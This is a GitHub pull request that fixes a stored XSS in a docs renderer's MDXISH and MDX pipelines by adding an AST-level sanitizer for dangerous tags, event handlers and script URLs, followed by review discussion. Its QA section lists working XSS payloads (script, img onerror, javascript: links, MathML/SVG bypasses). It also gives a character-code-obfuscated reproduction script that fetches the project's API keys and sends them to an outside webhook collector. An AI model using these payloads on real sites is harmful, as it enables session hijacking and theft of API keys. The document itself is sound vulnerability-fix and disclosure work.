Skip to content

fix: sanitize raw HTML in MDXISH & MDX renderers#1526

Open
eaglethrost wants to merge 10 commits into
nextfrom
dimas/rm-17024-stored-xss-in-hub-docs-renderer-via-mathml
Open

fix: sanitize raw HTML in MDXISH & MDX renderers#1526
eaglethrost wants to merge 10 commits into
nextfrom
dimas/rm-17024-stored-xss-in-hub-docs-renderer-via-mathml

Conversation

@eaglethrost

@eaglethrost eaglethrost commented Jun 26, 2026

Copy link
Copy Markdown
Contributor
🎫 Resolve RM-17024

🎯 What does this PR do?

Context

The was a reported vulnerability where a stored XSS in the hub docs renderer lets a non-owner put raw HTML in a guide body that runs JS in any viewer's session (incl. the owner's). From there an attacker reads same-origin endpoints (…/apikeys, …/projects/me) and exfiltrates the live API key + custom_login.jwt_secret → project takeover. Reported payload: <math><mtext><script>…</script></mtext></math>.

Root cause: raw HTML was never sanitized on the new engines:

  • mdxish runs rehypeRaw (raw HTML → real elements) with no sanitizer after it.
  • MDX compile only sanitizes when format === 'md'; main docs render in the default MDX format, which was not sanitized.
  • The legacy / md path was already protected by rehype-sanitize.

Correction to the report: it assumed bare <script> was already stripped and only MathML bypassed it. On mdxish & MDX (without non md format) nothing is stripped, bare <script>, <img onerror>, and javascript: all execute; the MathML wrapper isn't required (verified against the pipeline). So a MathML-only patch would've been insufficient.

Fix

Sanitize the rendered content in the AST level. Created an AST-level stripper shared by both the mdxish and MDX compile pipelines:

  • Removes script/foreign-content/resource-loading host elements
  • Strips on* handlers and javascript:/vbscript:/executable-data: URLs (incl. whitespace/control-char obfuscation).
  • Handles both node shapes: hast element (mdxish/md) and MDX JSX (mdxJsxFlowElement/mdxJsxTextElement).
  • Leaves PascalCase components untouched (their on*/url values are React props) but recurses through them so nested raw HTML is still cleaned.

Considerations & decisions

  • Denylist, not allowlist hast-util-sanitize (the md path) is allowlist-based and would strip every custom component + prop — which is why it's md-only. mdxish/MDX trees have first-class component nodes, so a denylist that preserves them is the fit. Trade-off: a denylist can miss a novel vector (see CSP below).
  • Why not use other libraries like DOMPurify It sanitizes HTML strings/DOM, not our AST: would mean a lossy serialize→reparse, strip all MDX components, can't see MDX JSX nodes, and needs jsdom on the server render path.

Note

This sanitisation is not applied to HTMLBlocks since it's for more deliberate HTML execution. For MDXISH & MDX, by default scripts are stripped anyway

What no longer works (intended)

This affects ffects mdxish/MDX docs with hand-authored raw HTML (all already blocked on md/legacy): inline <style>, raw <iframe> (use the Embed component), inline <svg>/<math>,<object>/<link>/<meta>/<base>, inline on* handlers, javascript: URLs. If an MDXISH or MDX uses those HTML in their doc, it will no longer work!

To discuss

  1. Soften iframe/svg? Currently removed wholesale (parity with md), all stripped of tags are in the DANGEROUS_TAG_NAMES list in dangerous-html.ts. We definitely want to strip script & math tags, but for the others I'm not sure if we want to
  2. CSP on hub doc pages (readme repo): The report mentions updating CSP, but that's not in scope of this work. I believe this PR would already block script execution so we don't necessarily need that change, but good to have
  3. Still-open (out of scope): component dangerouslySetInnerHTML sinks (HTMLBlock)

🧪 QA tips

End-to-end in the readme app

Locally link this branch to readme

  1. mdxish guide: paste the sample below → ✅ no alert, no apikeys/network request, no frames/SVG, page styling unaffected; the control block (bold/links/code/div/callout) renders.
  2. MDX doc (default format, not md): same content (note the <style>{ } block hits a pre-existing MDX compile error from CSS braces — use the @import variant, or test <style> alone) → same result.
  3. Non-breakage: existing <Callout>/<Tabs>/<Image>/<Embed>/[block:embed], table alignment, inline style=/class=, normal markdown all render unchanged.

Sample doc content

# Sanitizer QA

<script>alert(document.domain)</script>

<img src="x" onerror="alert(document.domain)" />

<a href="javascript:alert(document.domain)">click</a>

<math><mtext><script>alert(document.domain)</script></mtext></math>

<svg><script>alert(document.domain)</script></svg>

<svg width="200" height="40"><a xlink:href="javascript:alert(document.domain)"><text x="10" y="25">svg link</text></a></svg>

<iframe src="javascript:alert(document.domain)"></iframe>

<style>* { color: red !important; }</style>

<style>@import "https://example.com/deface.css"</style>

<!-- controls that SHOULD still render -->
**bold**, [normal link](https://example.com), `code`

<div class="note" style="border:1px solid #888">plain div, kept</div>

> 📘 callout, kept

After the fix every block above is inert; only the bold / link / code / div / callout controls render.

How to Replicate the Vulnerability in the report:

  1. Go to a doc in an MDXISH and MDX project
  2. Paste a content of this form
<math><mtext><script>fetch(String.fromCharCode(47,116,101,115,116,105,110,103,45,112,99,121,113,47,97,112,105,45,110,101,120,116,47,118,50,47,112,114,111,106,101,99,116,115,47,116,101,115,116,105,110,103,45,112,99,121,113,47,97,112,105,107,101,121,115)).then(function(r){return r.text()}).then(function(t){new Image().src=String.fromCharCode(104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,115,105,116,101,47,55,102,97,55,52,51,101,57,45,52,52,97,100,45,52,98,51,97,45,57,54,54,54,45,48,57,50,56,51,51,48,99,49,50,56,51,47,75,69,89,83,63,100,61)+encodeURIComponent(t)})</script></mtext></math>
  • 1st String.fromCharCode(...) decodes to //api-next/v2/projects//apikeys — the API-keys endpoint, reachable same-origin on the hub.
  • 2nd String.fromCharCode(...) decodes to the attacker's collector URL. I used an online web hook generator in web hook.site, use that URL and convert it to char codes
  1. Open the web hook site & track requests coming in
  2. View the page, refresh several times. You should notice requests coming in, containing the project keys
  3. The network tab will show a network call to apikeys

This is what it would look like in the app:

Screen.Recording.2026-06-26.at.10.44.54.pm.mov

📸 Screenshot or Loom

Before
In this demo, notice how in MDXISH & MDX, scripts, iframes, and svg, get exectued on View

Screen.Recording.2026-06-26.at.8.07.06.pm.mov

After
None of those top level tags execute

Screen.Recording.2026-06-26.at.8.08.11.pm.mov

Comment thread __tests__/lib/compile-sanitize.test.tsx Fixed
@eaglethrost eaglethrost changed the title fix: sanitize raw HTML in mdxish & MDX renderers (stored XSS) fix: sanitize raw HTML in MDXISH & MDX renderers Jun 26, 2026
@eaglethrost eaglethrost requested a review from a team June 26, 2026 13:03

// TODO: Skipped about the mdxish engine fails this test since it wraps the <pre> in a <p> tag
// Rendering looks correct, so skip this for now until we decide if we want to fix this or not
it.skip.each(renderingEngines)('%s: renders the html in a `<pre>` tag if safeMode={true}', (_label, renderContent) => {

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is now resolved

* load remote resources, or open a foreign-content (MathML/SVG) parsing context
* that lets `<script>` survive namespace-confusion bypasses.
*/
const DANGEROUS_TAG_NAMES = new Set([

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

From research, it seems that these tags are the main dangerous tags that might expose XSS vulnerability. It's quite extensive.

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If we've got object and applet should we also have embed?

@eaglethrost eaglethrost Jun 30, 2026

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah good point!

@eaglethrost eaglethrost Jul 1, 2026

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Wait sorry actually legacy magic block embeds translates to raw embeds, so I don't think we can strip it, at least for mdxish 😢 . Might worth transforming them to our Embed component, but need to ensure the previous rendering logic is retained.


// PascalCase names are custom React components (e.g. `<Callout>`), not host
// elements; their `on*`/url-like values are component props, not DOM handlers.
const isComponentName = (name: string): boolean => /^[A-Z]/.test(name);

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The main thing to be careful is that we don't sanitise custom MDX components accidentally.

Comment thread lib/compile.ts
},
]);
rehypePlugins.push([rehypeSanitize, sanitizeSchema]);
} else {

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Seems like the main MDX path has never sanitise these scripts. They don't get executed during compilation, but later during execution.

@kevinports kevinports left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

RE:

Soften iframe/svg? Currently removed wholesale (parity with md), all stripped of tags are in the DANGEROUS_TAG_NAMES list in dangerous-html.ts. We definitely want to strip script & math tags, but for the others I'm not sure if we want to

I'm inclined to allow SVG here because it's a common image format people inline in an html doc. I think we'd still have attribute-level sanitization which should cover our bases there?

It seems like for iframe we could strip them and tell folks to use the Embed block for this right?

* load remote resources, or open a foreign-content (MathML/SVG) parsing context
* that lets `<script>` survive namespace-confusion bypasses.
*/
const DANGEROUS_TAG_NAMES = new Set([

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If we've got object and applet should we also have embed?


if (isMdxJsxElement(node) && node.attributes) {
node.attributes = node.attributes.filter(attr => {
if (attr.type !== 'mdxJsxAttribute' || typeof attr.name !== 'string') return true; // keep `{...spread}`

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't follow this "// keep {...spread}" comment.

Does this mean a spread like {...{onclick: 'alert(1)'} will survive sanitization?

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes it will since we don't sanitise expressions yet, this PR is for top level script tags & attribute / properties sanitisation. We can extend it to expressions, but would need to be careful to not accidentally strip legit content in them.

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This plugin factory could probably just live at the bottom of dangerous-html.ts instead of a separate file for this wrapper.

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Should there be some unit tests that cover this function directly?

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yep good point!

@coderabbitai

coderabbitai Bot commented Jun 30, 2026

Copy link
Copy Markdown
Contributor

Review Change Stack

No actionable comments were generated in the recent review. 🎉

ℹ️ Recent review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 8780ac8a-4e8e-4e88-be90-cc824baa508b

📥 Commits

Reviewing files that changed from the base of the PR and between 26e7f0f and 1b2b2c9.

📒 Files selected for processing (1)
  • lib/compile.ts
🔗 Linked repositories identified

CodeRabbit considers these linked repositories for cross-repo context during reviews:

🚧 Files skipped from review as they are similar to previous changes (1)
  • lib/compile.ts

Walkthrough

This PR adds a rehype plugin, stripDangerousHtml, that removes dangerous HTML elements and unsafe attributes from HAST and MDX JSX trees. It is wired into the compile path for non-md formats and into mdxish after rehypeRaw. The compile pipeline also now merges caller-provided remark/rehype plugins explicitly. New tests cover the plugin directly, both sanitization pipelines, and the previously skipped HTMLBlock safeMode case.

Changes

Related issues: None provided.
Related PRs: None provided.
Suggested labels: security, tests
Suggested reviewers: None provided.

Sequence Diagram(s)

sequenceDiagram
  participant compile as compile()
  participant mdxish as mdxish()
  participant plugin as rehypeStripDangerousHtml
  participant tree as HAST/MDX tree

  compile->>plugin: add to non-md rehypePlugins
  mdxish->>plugin: run after rehypeRaw
  plugin->>tree: visit nodes
  plugin->>tree: remove dangerous elements and attributes
  plugin-->>compile: sanitized output
  plugin-->>mdxish: sanitized output
Loading

Poem
Safe tags remain; unsafe tags fall.


Comment @coderabbitai help to get the list of available commands.

@coderabbitai coderabbitai Bot left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 3

🧹 Nitpick comments (2)
__tests__/lib/compile-sanitize.test.tsx (1)

29-32: 🔒 Security & Privacy | 🔵 Trivial | ⚡ Quick win

Add explicit vbscript: and dangerous data: payloads here.

The current fixture only feeds javascript: into execute(), so a regression on the other blocked schemes would still pass. Add concrete inputs for those schemes to lock in the full URL-sanitization contract.

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@__tests__/lib/compile-sanitize.test.tsx` around lines 29 - 32, The
compile-sanitize test only exercises the javascript: case, so it does not
protect the full URL-sanitization contract. Update the test in
compile-sanitize.test.tsx around the execute() fixture to include explicit
vbscript: and dangerous data: payload inputs alongside the existing javascript:
case, and keep the href assertions in the same test so it verifies all blocked
schemes remain non-executable.
__tests__/processor/plugin/dangerous-html.test.ts (1)

124-134: 🔒 Security & Privacy | 🔵 Trivial | ⚡ Quick win

Add a regression for expression-valued URL attributes.

The MDX JSX tests only cover string URL values. Add a host-element case where href or formAction is an expression node resolving to a dangerous scheme, matching the sanitizer gap above.

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@__tests__/processor/plugin/dangerous-html.test.ts` around lines 124 - 134,
The MDX JSX dangerous-attribute tests only cover string-valued URL props, so add
a regression in dangerous-html.test.ts for host JSX elements whose href or
formAction is an expression node resolving to a javascript: (or other dangerous)
URL. Update the MDX JSX section alongside the existing jsx() /
stripDangerousHtml(root(node)) case to assert that expression-valued URL
attributes are also removed while safe attributes like id remain.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@__tests__/lib/mdxish/sanitize-raw-html.test.ts`:
- Around line 109-118: The test around mdxish sanitization is over-preserving
dangerous URL props on PascalCase components. Update the behavior in the mdxish
sanitize path and the corresponding expectation in sanitize-raw-html.test.ts so
custom components like TestComponent still keep safe props such as onClick but
do not retain javascript: values on href/src-style URL props unless they are
explicitly allowlisted. Use the existing mdxish and findElementByTagName test
setup to verify the dangerous prop is stripped or blocked instead of locked in.

In `@lib/compile.ts`:
- Around line 83-87: The `compile` path currently lets `...opts` override
`rehypePlugins`, which can drop `rehypeStripDangerousHtml` from the MDX
pipeline. Update the `compile` function so caller options are merged before the
explicit plugin list, or otherwise ensure user-supplied `rehypePlugins` are
appended while `rehypeStripDangerousHtml` is always added last. Use the
`compile` function and the `rehypePlugins`/`rehypeStripDangerousHtml` symbols to
locate the fix.

In `@processor/plugin/dangerous-html.ts`:
- Around line 129-134: The MDX attribute sanitizer in dangerous-html.ts only
rejects dangerous URL values when they are strings, so host elements can still
receive non-string URL props like href expressions. Update the filter inside the
node.attributes processing to treat any URL-bearing attribute on host MDX
elements as unsafe unless it is a clearly safe string literal, using the
existing helpers isUrlAttribute and isDangerousUrl in the attr.name/attr.value
check.

---

Nitpick comments:
In `@__tests__/lib/compile-sanitize.test.tsx`:
- Around line 29-32: The compile-sanitize test only exercises the javascript:
case, so it does not protect the full URL-sanitization contract. Update the test
in compile-sanitize.test.tsx around the execute() fixture to include explicit
vbscript: and dangerous data: payload inputs alongside the existing javascript:
case, and keep the href assertions in the same test so it verifies all blocked
schemes remain non-executable.

In `@__tests__/processor/plugin/dangerous-html.test.ts`:
- Around line 124-134: The MDX JSX dangerous-attribute tests only cover
string-valued URL props, so add a regression in dangerous-html.test.ts for host
JSX elements whose href or formAction is an expression node resolving to a
javascript: (or other dangerous) URL. Update the MDX JSX section alongside the
existing jsx() / stripDangerousHtml(root(node)) case to assert that
expression-valued URL attributes are also removed while safe attributes like id
remain.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 73d07070-afbb-4a74-8810-65b56e65c59c

📥 Commits

Reviewing files that changed from the base of the PR and between d94d9ff and 31035c3.

📒 Files selected for processing (8)
  • __tests__/components/HTMLBlock.test.tsx
  • __tests__/lib/compile-sanitize.test.tsx
  • __tests__/lib/mdxish/sanitize-raw-html.test.ts
  • __tests__/processor/plugin/dangerous-html.test.ts
  • lib/compile.ts
  • lib/mdxish.ts
  • package.json
  • processor/plugin/dangerous-html.ts
🔗 Linked repositories identified

CodeRabbit considers these linked repositories for cross-repo context during reviews:

Comment thread __tests__/lib/mdxish/sanitize-raw-html.test.ts Outdated
Comment thread lib/compile.ts
Comment thread processor/plugin/dangerous-html.ts

@coderabbitai coderabbitai Bot left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@lib/compile.ts`:
- Around line 70-75: The remark plugin merge order in compile() is wrong because
userRemarkPlugins are added before tailwindTransformer, allowing caller plugins
to run on the pre-Tailwind AST. Update the plugin assembly in lib/compile.ts so
tailwindTransformer is inserted before appending userRemarkPlugins, keeping the
intended order in the remarkPlugins array.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: ffde9a6f-f2b9-4853-ac63-b6a29a8a2476

📥 Commits

Reviewing files that changed from the base of the PR and between 31035c3 and 26e7f0f.

📒 Files selected for processing (5)
  • __tests__/lib/compile-sanitize.test.tsx
  • __tests__/lib/mdxish/sanitize-raw-html.test.ts
  • __tests__/processor/plugin/dangerous-html.test.ts
  • lib/compile.ts
  • processor/plugin/dangerous-html.ts
🔗 Linked repositories identified

CodeRabbit considers these linked repositories for cross-repo context during reviews:

✅ Files skipped from review due to trivial changes (1)
  • tests/lib/mdxish/sanitize-raw-html.test.ts
🚧 Files skipped from review as they are similar to previous changes (3)
  • tests/lib/compile-sanitize.test.tsx
  • tests/processor/plugin/dangerous-html.test.ts
  • processor/plugin/dangerous-html.ts

Comment thread lib/compile.ts Outdated
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants